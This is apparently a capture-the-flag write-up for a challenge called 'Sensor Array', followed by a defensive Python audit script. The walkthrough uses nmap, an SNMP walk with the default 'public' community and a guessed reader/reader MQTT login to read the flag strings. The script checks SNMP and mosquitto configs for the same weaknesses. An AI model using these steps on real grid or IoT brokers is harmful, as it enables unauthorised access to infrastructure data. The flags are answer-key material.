Sensor Array
🧠 Challenge Text
Hi, emergency troubleshooter,
sensor data from the distribution network are being continuously transmitted to broker.powergrid.tcc. However, the outsourced provider went bankrupt last week, and no one else has knowledge of how to access these data. Find out how to regain access to the sensor array data.
Stay grounded!
🎨 Solution
Let's start by scanning the network for open ports.
- TCP IPv4
$ nmap -p- broker.powergrid.tcc
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 22:49 CET
Nmap scan report for broker.powergrid.tcc (10.99.25.50)
Host is up (0.017s latency).
Other addresses for broker.powergrid.tcc (not scanned): 2001:db8:7cc::25:50
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE
1883/tcp open  mqtt
- UDP IPv4
$ sudo nmap -sU -p 53,123,161,500,1900 -sV broker.powergrid.tcc
Other addresses for broker.powergrid.tcc (not scanned): 2001:db8:7cc::25:50
PORT     STATE  SERVICE VERSION
53/udp   closed domain
123/udp  closed ntp
161/udp  open   snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
500/udp  closed isakmp
1900/udp closed upnp
Service Info: Host: Mosquitto
As we can see, MQTT TCP port 1883 is open, and UDP port 161 hosts an SNMPv3 server. MQTT is a standard messaging protocol for the Internet of Things (IoT). To subscribe to all topics, let's use the mosquitto tool and run:
$ mosquitto_sub -h broker.powergrid.tcc -t "#"
Connection error: Connection Refused: not authorised.
Looks like we are not authorized. Before brute-forcing the username and password, it's worth checking the SNMPv3 server.
$ snmpwalk -v1 -c public broker.powergrid.tcc
iso.3.6.1.2.1.1.1.0 = STRING: "MQTT broker for power grid sensors. Only reader has the rights to subscribe to a topic!"
iso.3.6.1.2.1.1.3.0 = Timeticks: (173529253) 20 days, 2:01:32.53
iso.3.6.1.2.1.1.5.0 = STRING: "Mosquitto"
iso.3.6.1.2.1.1.6.0 = STRING: "DC A, area 51"
iso.3.6.1.2.1.1.7.0 = INTEGER: 1
End of MIB
Gotcha: we found a user, reader, who has the rights to subscribe to a topic. Let's try a simple login.
$ mosquitto_sub -h broker.powergrid.tcc -t "#" -u reader -P reader
TEST{1vX4-7hk7-a16H-pi45}
TEST{bvX2-B8k7-3b6H-MY8p}
FLAG{0hs0-SiJm-TO5B-46HD}
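From the operator's side, the two exposures this walkthrough relied on (a default SNMP community and a system description that names a broker account) can be caught by a configuration audit. The script below is an added example, not part of the original write-up. The snmpd.conf, password file and ACL contents are constructed samples (only the sysDescr text comes from the page), and the `writer` account and the ACL entries are assumptions.

```python
import re

DEFAULT_COMMUNITIES = {"public", "private"}
SYSTEM_KEYS = {"sysdescr", "syslocation", "syscontact", "sysname"}

def broker_users(passwd_text):
    """Account names from a mosquitto password file ("name:hash" per line)."""
    return {ln.split(":", 1)[0].strip() for ln in passwd_text.splitlines() if ":" in ln}

def audit_snmpd(conf_text, users):
    """Flag default communities and system strings that name a broker account."""
    findings = []
    for no, raw in enumerate(conf_text.splitlines(), 1):
        parts = raw.split("#", 1)[0].split(None, 1)   # drop comments, split key/value
        if len(parts) < 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key.startswith(("rocommunity", "rwcommunity")):
            if value.split()[0] in DEFAULT_COMMUNITIES:
                findings.append((no, "default-community", value.split()[0]))
        elif key in SYSTEM_KEYS:
            for user in sorted(users):
                if re.search(rf"\b{re.escape(user)}\b", value, re.IGNORECASE):
                    findings.append((no, "account-name-in-" + parts[0], user))
    return findings

def audit_acl(acl_text):
    """Flag ACL entries that grant read access to the all-topics wildcard '#'."""
    findings, user = [], None
    for no, raw in enumerate(acl_text.splitlines(), 1):
        words = raw.split()
        if not words or words[0].startswith("#"):    # blank line or comment
            continue
        if words[0] == "user" and len(words) > 1:
            user = words[1]
        elif words[0] == "topic" and words[-1] == "#":
            access = words[1] if len(words) == 3 else "readwrite"  # default access
            if access in ("read", "readwrite"):
                findings.append((no, "wildcard-read", user or "<anonymous>"))
    return findings

# Constructed sample files modelled on the broker in this write-up (not real configs).
SNMPD = ("rocommunity public\n"
         "sysDescr MQTT broker for power grid sensors. Only reader has the rights to subscribe to a topic!\n"
         "sysLocation DC A, area 51\n")
PASSWD = "reader:$7$<hash placeholder>\nwriter:$7$<hash placeholder>\n"
ACL = "# constructed ACL\nuser reader\ntopic read #\nuser writer\ntopic write sensors/#\n"

if __name__ == "__main__":
    print(*audit_snmpd(SNMPD, broker_users(PASSWD)), *audit_acl(ACL), sep="\n")
```

Each finding is a `(line number, rule, value)` tuple. The audit does not test password strength, so a password equal to the username still has to be caught by a separate credential policy check.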